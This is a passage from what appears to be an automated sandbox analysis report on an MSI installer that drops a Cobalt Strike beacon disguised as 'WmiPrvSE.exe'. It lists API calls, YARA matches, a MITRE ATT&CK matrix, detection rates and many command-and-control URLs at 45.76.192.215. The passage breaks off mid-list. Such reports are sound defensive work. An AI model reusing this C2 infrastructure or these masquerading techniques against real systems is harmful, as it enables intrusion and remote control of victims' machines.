Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\Public\WmiPrvSE.exe

Code function: 23_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,FindCloseChangeNotification,

23_2_00401630

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000887A0 GetLocalTime,

4_2_000887A0

Source: C:\Users\Public\WmiPrvSE.exe

Code function: 23_2_00775E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

23_2_00775E28

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000616C0 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,

4_2_000616C0

Source: C:\Users\Public\WmiPrvSE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 Blob

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTR
Source: Yara match	File source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00776A78 socket,htons,ioctlsocket,closesocket,bind,listen,	23_2_00776A78
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00776670 htonl,htons,socket,closesocket,bind,ioctlsocket,	23_2_00776670
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0077EE8C socket,closesocket,htons,bind,listen,	23_2_0077EE8C

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Native API	1 Scripting	1 Exploitation for Privilege Escalation	12 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	1 Replication Through Removable Media	1 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	21 Access Token Manipulation	11 Software Packing	NTDS	4 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	37 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 File Deletion	Cached Domain Credentials	341 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	132 Masquerading	DCSync	121 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	121 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	12 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1eSOBjseu2.msi	32%	Virustotal		Browse
1eSOBjseu2.msi	42%	ReversingLabs	Win64.Backdoor.Cobeacon

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\WmiPrvSE.exe	100%	Avira	HEUR/AGEN.1344321
C:\Users\Public\WmiPrvSE.exe	100%	Joe Sandbox ML
C:\Users\Public\WmiPrvSE.exe	88%	ReversingLabs	Win64.Trojan.CobaltStrike
C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	47%	ReversingLabs	Win32.Trojan.CobaltStrike
C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	0%	ReversingLabs
C:\Windows\Installer\MSI3FB2.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI4020.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI4060.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI4080.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI40BF.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI40EF.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI44AA.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
bg.microsoft.map.fastly.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://contoso.com/License	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://45.76.192.215/xq	0%	Avira URL Cloud	safe
https://45.76.192.215/pq	0%	Avira URL Cloud	safe
http://crl.micro	0%	URL Reputation	safe
https://45.76.192.215:59611/loadkFTJ	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/YF	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/loadMFvJ&	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/adGFxJ(	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/KX0J	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/ad	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/ad5F.J	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/load;F$J	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/loadYF	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/load5F.J	0%	Avira URL Cloud	safe
https://45.76.192.215:59611//F	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/GFxJ(	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/loadGFxJ(	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/load	0%	Avira URL Cloud	safe
45.76.192.215	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/load.215:59611/load	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/load	0%	Virustotal		Browse
https://45.76.192.215:59611/load21	0%	Avira URL Cloud	safe
45.76.192.215	1%	Virustotal		Browse
https://45.76.192.215:59611/qFbJ	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/9	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/92.215:59611/sX(J	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/3X	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/loadnY	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/load.215:59611/load	0%	Virustotal		Browse
http://127.0.0.1:%u/	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/HF	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/vFoJ	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/oad	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/load.215:59611/GFxJ(	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/load.215:59611/BFsJ	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/loadv	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/92.215:59611/	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/kX	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/load.215:59611/loadGFxJ(	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/oad	0%	Virustotal		Browse
https://45.76.192.215:59611/kFTJ	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/92.215:59611/	0%	Virustotal		Browse
https://45.76.192.215:59611/load.215:59611/adMFvJ&	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/loadkY	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/loadgY	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/5F.J	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/loadCY	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://45.76.192.215:59611/load.215:59611/	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/sX(J	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/load.215:59611/oad	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/MFvJ&	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/oad;F$J	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/oad5F.J	0%	Avira URL Cloud	safe
https://45.76.192.215:59611/loadcs	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.76.192.215	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://45.76.192.215/xq	WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/loadkFTJ	WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1606499631.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1650092146.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215/pq	WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/YF	WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://45.76.192.215:59611/loadMFvJ&	WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/adGFxJ(	WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/KX0J	WmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901236743.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 